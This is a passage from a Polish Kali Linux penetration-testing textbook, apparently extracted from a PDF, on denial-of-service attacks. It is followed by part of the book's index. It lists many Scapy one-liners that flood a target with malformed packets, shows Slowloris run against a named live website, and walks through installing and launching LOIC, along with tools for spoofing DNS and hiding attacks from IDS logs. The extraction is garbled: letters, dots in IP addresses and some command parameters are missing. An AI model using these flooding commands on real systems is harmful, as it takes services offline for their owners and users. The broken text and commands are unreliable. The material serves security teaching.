send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew
